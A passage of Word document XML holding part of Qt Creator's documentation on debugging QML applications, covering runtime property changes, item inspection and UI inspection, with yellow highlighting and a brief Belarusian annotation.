            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>D</w:t>
        </w:r>
        <w:r w:rsidRPr="003613F0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
        <w:r w:rsidRPr="003613F0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>bugger Console</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00DB71E8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2777" w:name="applying-qml-changes-at-runtime"/>
      <w:bookmarkStart w:id="2778" w:name="_Toc483604477"/>
      <w:bookmarkStart w:id="2779" w:name="_Toc483605697"/>
      <w:bookmarkEnd w:id="2777"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Applying QML Changes at Runtime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2778"/>
      <w:bookmarkEnd w:id="2779"/>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00DB71E8" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When you change property values in the</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger Console</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or in the</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locals and Expressions</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8" w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view, they are immediately updated in the running application, but not in the source code</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>заўваж, што не ў зыходным кодзе!</w:t>
      </w:r>
      <w:r w:rsidR="00DB71E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00DB71E8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2780" w:name="inspecting-items"/>
      <w:bookmarkStart w:id="2781" w:name="_Toc483604478"/>
      <w:bookmarkStart w:id="2782" w:name="_Toc483605698"/>
      <w:bookmarkEnd w:id="2780"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inspecting Items</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2781"/>
      <w:bookmarkEnd w:id="2782"/>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color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While the application is running, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use the</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locals and Expressions</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>view to explore the QML item structure</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qtcreator/images/qml-observer-view.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1084" type="#_x0000_t75" alt="&quot;QML item tree&quot;" style="width:330.05pt;height:149.75pt">
            <v:imagedata r:id="rId3032" r:href="rId3033"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>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F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To keep the application visible while you interact with the debugger, select</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6" w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Show Application on Top</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You can view a QML item in</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Locals and Expressions</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ways</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00F370E6" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Expand the item in the object tree.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00F370E6" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select the item in the code editor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="00F370E6" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidR="00F370E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to activate selection mode and then click an item in the running application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>change property values temporarily, without editing the source, double-click them and enter the new values</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. You can view the results in the running application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00F370E6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2783" w:name="inspecting-user-interfaces"/>
      <w:bookmarkStart w:id="2784" w:name="_Toc483604479"/>
      <w:bookmarkStart w:id="2785" w:name="_Toc483605699"/>
      <w:bookmarkEnd w:id="2783"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Inspecting User Interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2784"/>
      <w:bookmarkEnd w:id="2785"/>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When you debug complex applications</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you ca</w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n jump to the position in code where an item is defined</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or you </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can zoom into the user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
